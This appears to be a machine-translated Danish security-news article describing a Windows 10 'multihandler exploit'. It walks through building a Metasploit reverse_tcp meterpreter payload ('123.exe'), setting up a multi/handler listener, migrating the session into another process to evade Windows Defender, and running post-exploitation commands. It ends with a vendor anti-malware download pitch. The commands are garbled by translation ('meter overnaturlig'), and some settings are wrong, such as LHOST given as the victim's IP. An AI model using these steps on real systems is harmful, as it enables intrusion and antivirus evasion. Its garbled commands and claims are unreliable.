Hjem > Cyber ​​Nyheder > Kritiske Windows 10 Sårbarhed - Multihandler Exploit
CYBER NEWS

kritisk Windows 10 Sårbarhed - Multihandler Exploit

Navn Trojan:Win32 / Swrort
Type Trojan
Kort beskrivelse Læs og skriv tilladelser i Windows 10. Tillader angriberen at inficere andre pc tilsluttet til den inficerede én.
Symptomer Viser sig af en uvant .exe-fil.
Distributionsmetode Spam mails. MITM angreb, ondsindede omdirigeringer.
Værktøj Detection Hent SpyHunter, at se, om dit system er blevet påvirket af Trojan:Win32 / Swrort

p15_0000En farlig exploit er blevet opdaget i Windows 10, ved hjælp af en Trojan:Win32 / Swrort at omgå Windows Defender og få læst og skrive tilladelser. Anonym forsker har vist sårbarheden fra en kanal, kaldet Metasploitstation. Han viser 3 faser, hvor du kan glide forbi Windows 10 forsvar. Der var ingen oplysninger opdaget hidtil på, om dette udnytter er fastsat eller ingen.

Vinduer 10 Multihandler Exploit Infektion – Hvordan gør man det?

I videoen, tech-kyndige bruger demonstrerede en simulation af en '123.exe' fil, som han skaber og udfører, som om den blev åbnet i den virkelige verden som en vedhæftet fil til en e-mail eller henrettes ved en anden metode. Vi har valgt at opdele infektionen proces i tre faser for at hjælpe dig med bedre at forstå den metode.

Fase 1: Fil Forberedelse

Hackeren skaber en nyttelast med denne konfiguration i et Linux-miljø:

msfpaayload vinduer / meter overnaturlig / reverse_tcp LHOST = LPORT = x> / home / men / Ny mappen / 123.EXE

portnumber1 * – Dette er terminalen anvendes for angrebet. Det kan være en havn (4444, 4324, etc.). Vi har skrevet portnumber1 siden han bruger en anden portnummer, som vi navngivet bagefter.

Efter denne fase er afsluttet, og filen er oprettet af angriberen og faldt på brugerens system,, angriberen kan fortsætte til fase 2.

Fase 2: Brug af udnytte.

På dette tidspunkt, hackeren bruger multihandler at gøre det se .exe og drage fordel af den udnytte til at åbne en aktiv session(forbinde) til offeret PC.

Dette kan ske ved hjælp af de nuværende kommandolinjer:

msfconsole (For at starte konsollen. Åbner op 'MSF>' interface)

I 'MSF' hackeren kan udføre følgende kommandoer:

MSF> brug udnytter / multi / handleren
sæt lhost 'offer IP-adresse’
Set lport 'portnumber1’

Efter at, angriberen udfører nyttelasten til at etablere en session:

msfexploit(handleren)> Indstil nyttelast vinduer / meter overnaturlig / reverse_tcp

For at kontrollere om en aktiv session er mulig, angriberen skriver kommandoen msfexploit(handleren)> Vis indstillinger, der gør ham til at se denne

→EXITFUNC proces ja Exit teknik(accepteret: seh, tråd..)
LHOST offer IP-adresse ja lytte port
LPORT portnumber1 ja lytte adresse

Dette tillader ham at se, at han konfigureret indstillingerne korrekt og kan fortsætte med den faktiske infektion af computeren.

Fase 3: Infektion

Kommandoen at angriberen bruger til at indlede en aktiv session med offeret er 'Udnytte'. Efter at denne kommando, filen "123.exe 'gav med dette svar:

[*] Startede omvendt handler om
[*] Start af nyttelast handleren…

På dette tidspunkt, den eksekverbare blev startet på Windows-maskine. På trods af, at Windows Defender-softwaren kørte, det gjorde ikke stoppe angrebet. Men når scannet for virus, Windows antivirus program straks opdaget "123.exe 'som en trojansk:Win32 / Swrort.A.

For at undgå at blive opdaget, angriberen brugt en taktik, kaldet migrerende som skabte en "notepad.exe" fil, der migrerer den aktive session fra "123.exe 'til denne fil ved at forbinde. Dette blev gjort ved hjælp af kommandoen:

meter overnaturlig> køre post / vinduer / styre / migrere

Efter at migrere processen og gentage det samme simulering, men ved hjælp af (anden port), angriberen var i gang. Denne tid, hvor angriberen fik i pc'en han ikke blev registreret, selv efter Windows Defender gjorde en scanning og "123.exe 'filen stadig var til stede på computeren.

Derfra, angriberen viste fuld læse og skrev tilladelser ved at oprette en ny mappe med et nyt tekstdokument. Så vidt vi ved, er de vigtigste kommandoer, der kan anvendes efter forbindelse er:

> Sysinfo - for at vise systemet versionen og information.
> dir :/ – at åbne enhver målmappen.
> Skal - for at vise Windows-versionen og anden information.
> Getwid - viser Windows ID.
> Ps -aux - viser alle .exe filer, der kører i Windows Jobliste.
> Ifconfig - viser oplysninger om grænseflader (IP-adresser og andre oplysninger). Denne kommando giver angriberen oplysningerne til at oprette forbindelse til en anden computer, der er i den samme NIC og VLAN med den inficerede pc. Dette kan være meget ødelæggende for hjemmet eller kontor netværk i tilfælde sådant angreb er godt organiseret.

Vinduer 10 exploits – Konklusion

Der er ingen egentlig information om, hvorvidt dette udnytter er blevet fastsat, men ligesom med enhver anden software, der kan være mere udækkede dem. Det er derfor, at hvis du bruger Windows 10, anbefaler vi at hente og installere avanceret malware beskyttelse program. Det vil aktivt beskytte dig og opdatere sig selv jævnligt med de nyeste trusler. Også, sådant program har aktive skjolde, der umiddelbart registrerer uautoriserede tilslutninger.

donload_now_250
Spy Hunter scanner kun detektere trussel. Hvis du ønsker, at truslen skal fjernes automatisk, du nødt til at købe den fulde version af anti-malware værktøj.Læs mere om SpyHunter Anti-Malware værktøj / Sådan fjernes SpyHunter

Berta Bilbao

Berta er en dedikeret malware forsker, drømmer om en mere sikker cyberspace. Hendes fascination af it-sikkerhed begyndte for et par år siden, da en malware låst hende ud af hendes egen computer.

Flere indlæg

Efterlad en kommentar

Din e-mail-adresse vil ikke blive offentliggjort. Krævede felter er markeret *

This website uses cookies to improve user experience. By using our website you consent to all cookies in accordance with our Fortrolighedspolitik.
Jeg er enig